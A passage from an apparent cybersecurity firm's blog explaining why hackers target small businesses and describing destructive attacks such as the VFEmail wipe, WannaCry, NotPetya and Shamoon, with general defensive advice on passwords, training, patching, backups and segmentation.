Needless to say, this chain reaction can have a crushing impact on your small business. It could cause extensive disruptions to your workflow, triggering delays and adding friction to your client relationships.
So, why do hackers target small businesses? And what can you do to help safeguard your growing enterprise from their attacks?
A Complacent Approach to Cybersecurity
One reason hackers tend to target small businesses is complacency.
Not every emerging company falls into this camp, of course — some do take a strict approach to securing their network. However, it’s not uncommon to find small-business owners believing themselves to be ‘too small’ for hackers to target.
This mindset can be dangerous. It’s the very thing hackers will bank on to gain access to your system.
A Lack of Investment
Another issue is the lack of funds to finance high-quality cybersecurity solutions — and that’s understandable. After all, you have so much to cover already. Salaries. Rent. Equipment. The list goes on and on.
But cybersecurity must be a priority for your small business. Never underestimate hackers’ ruthlessness: a company without the money to pay for effective safeguards or a real grasp of how vulnerable they are is an ideal target. Criminals see an ill-informed, ill-prepared enterprise as low-hanging fruit.
Don’t make their ‘work’ easier. Don’t give them any obvious vulnerabilities to exploit.
Small Businesses are More Likely to Pay Ransoms
Ransomware has been a growing threat to companies of all sizes in the past year or so. Hackers essentially lock businesses out of their own systems (or, at least, parts of it) and demand money in exchange for their freedom.
Businesses don’t have to pay up to get full access again, as experts can help. However, small companies who may be a little less educated on the topic will believe handing the money over is the only way out of the situation.
They could also feel as if being unable to continue on track will put them out of business.
Untrained Staff Fall Prey to Phishing Scams
Hackers see small businesses as ripe targets as their staff may not be aware of common malware attacks and phishing scams. They may not recognize the warning signs of, say, infected email attachments or dangerous links.
This can open the door to data breaches, ransomware and more. Any employees responsible would no doubt feel incredibly guilty as their colleagues and clients face the consequences of their mistake.
But it’s not just their fault: it’s down to small businesses to make sure proper education and training is in place to maximize workers’ knowledge, boost vigilance and minimize threat levels.
How can Small Businesses Protect Themselves Against Cyberattacks?
As a small-business owner, there are multiple steps you can take to protect your company, your employees and your clients from possible cybersecurity risks.
Implement a strict password strategy
We all have numerous passwords for online accounts. Maybe you have one or two for your banking. Perhaps a few more for streaming services (Netflix, Hulu etc.). You’ll probably have others for social networks too (Facebook, Twitter, Instagram, WhatsApp to name just a few).
It’s hard to keep track of these. That’s why so many of us use the same single password for every account — and that’s dangerous. Because if a hacker cracks it, they’ll have access to everything else too.
You can’t afford to make the same mistake with your business’s security. Make sure your team members understand just how important unique passwords are for the tools they use on a daily basis. They should create passwords including a mix of lowercase and uppercase characters, numbers and symbols.
This takes more time and can feel like a hassle, but it’s well worth it for added peace of mind. Make sure to change passwords once or twice a month, if not more often.
Invest in expert training
Consider bringing a cybersecurity expert into your business to train your employees on effective steps they can take to minimize their risk of exposing data to criminals.
This can make a big difference and empower workers with the confidence to remain vigilant at all times. If every member of the team knows how to identify a potential threat and take action to avoid it, your small business will be much safer against cyberattacks.
Be careful with authorizations
Sadly, cyberattacks may not originate from outside your business — they could be the work of an employee.
This may be an individual with a grudge or simply someone who’s incompetent. Whatever the reason, internal threats can be prevented by reviewing your authorization strategy.
Take care to only grant your most trustworthy, reliable employees access to sensitive data. Monitor your team’s activities and update your cybersecurity measures on a regular basis.
Every small business must take cyberattacks seriously. Never assume you’re not at risk just because there are so many bigger targets to aim for — this complacency and lack of preparation could be a hacker’s way in.
Trust our experts to provide all the help you need with your small business’s cybersecurity.
Contact us todayto discuss your options with a member of our team and subscribe to our newsletter for the latest essential updates.
Can Your Organization Survive a Cyberattack that Permanently Destroys Data?
Financial gain, either short-term or long-term, is often the motive of most cyber criminals. Some cyber criminals, however, aren’t after financial gain, but rather, they’re simply out to cause as much damage as possible.
The recent cyberattack at email service provider VFEmail shows an unconventional motive of simple destruction. Milwaukee-based VFEmail, founded in 2001, provides email service to businesses and individuals.
The first hints of the cyberattack on VFEmail came out last February 11, when the company’s Twitteraccount issued a series of tweets about the attack, starting with a tweet that said, “This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.”
By 5 PM on February 11, the company declared on its website, “We have suffered catastrophic destruction at the hands of a hacker.” The company added that the attacker destroyed nearly two decades' worth of emails of all data in the US, both primary and backup systems.
The company further said that the attacker hasn’t asked for ransom. “Just attack and destroy," the company said. When asked about the identity of the attacker, VFEmail owner Rick Romero tweetedit could be "someone who had data they didn't want found or I really pissed off."
This recent cyber incident isn’t the first time that cyber criminals have targeted VFEmail. In a blog postdated November 4, 2015, Romero shared that a group of hackers threatened to launch a distributed denial-of-service (DDoS) on his email service if he doesn’t pay 5 Bitcoins.
True enough, after refusing to pay the ransom, VFEmail’s email service was disrupted by a DDoS attack prompting Romero to expose the group's extortion campaign. In 2017, the company’s email service was once again disrupted by a series of DDoS attacks, prompting the company to change to a new hosting provider. In 2018, the company’s email service was once again disrupted by a DDoS attack.
It isn’t clear what actually caused the latest cyberattack on VFEmail. What’s clear though is that the company’s nearly two decades' worth of emails of all data in the US, both primary and backup systems, are lost forever.
Other Cases of Disruptive Cyberattacks
WannaCry and NotPetya
WannaCry and NotPetya are two examples of cyberattacks that were meant mainly to destroy. At the height of WannaCry attack on May 12, 2017, an estimated 300,000 computers in 150 countries were infected by WannaCry malicious software (malware). Six weeks after the WannaCry attack, NotPetya malware was launched although it didn’t have as much impact as WannaCry.
Both WannaCry and NotPetya exhibit the characteristics of a ransomware, a type of malware that’s designed to deny legitimate users access to computer files by encrypting these files. Similar to other ransomware, WannaCry and NotPetya attackers also demanded ransom from their victims, assuring them that once ransom is paid, the decryption key that would unlock the encrypted files would be given.
While exhibiting the characteristics of a ransomware, both WannaCry and NotPetya were later found to be wipers – malware whose sole purpose was to destroy. Both WannaCry and NotPetya are considered as wipers, not ransomware, as despite paying ransom to the attackers, the attackers wouldn’t be able to give the correct decryption key as they themselves have no way of determining who paid the ransom and who didn’t.
Shamoon is another malware whose main purpose is destruction. In December 2018, Italian oil services firm Saipemreported that its servers based in the Middle East, India, Aberdeen and, in a limited way, Italy were infected by a variant of Shamoon malware. As typical effects of the Shamoon malware, Saipem said in a statement, the infection resulted in the "cancellation of data and infrastructures." Days after the statement, the company’s head of digital and innovation, Mauro Piasere, told Reutersthat the attack crippled between 300 and 400 servers and up to 100 personal computers out of a total of about 4,000 Saipem machines.
According to Symantec, the latest version of Shamoon is far more destructive than the original Shamoon as the latest version has a new, second piece of wiping malware called “Trojan.Filerase,” a malware that deletes and overwrites files on the infected computer; while the original Shamoon malware itself erases the master boot record of the computer, rendering the computer unusable.
Because of the Filerase malware in the latest Shamoon version, Symantec said, recovery becomes impossible, compared to the older version of Shamoon in which the “files on the hard disk may be forensically recoverable.”
Here are some cybersecurity best practices in order to help prevent or minimize the effects of destructive cyberattacks – attacks that are meant to destroy:
Keep All Software Up-to-Date
Installing the latest patch or security update in a timely manner is one of the ways to keep destructive attacks at bay. Patches or security updates fix known security vulnerabilities that are likely to be exploited by cyber criminals.
Back-up Important Data
Similar to safeguarding your organization’s data from natural disasters, including fire and flood, having a back-up of important data will enable your organization to bounce back from a debilitating destructive cyberattack.
Practice Network Segmentation
It’s also important to practice network segmentation – the process of dividing your organization’s network into subnetworks. Network segmentation ensures that in case an attacker is able to infiltrate one of your organization’s network, the other networks won’t be affected.
Steve E. Driz, I.S.P., ITCP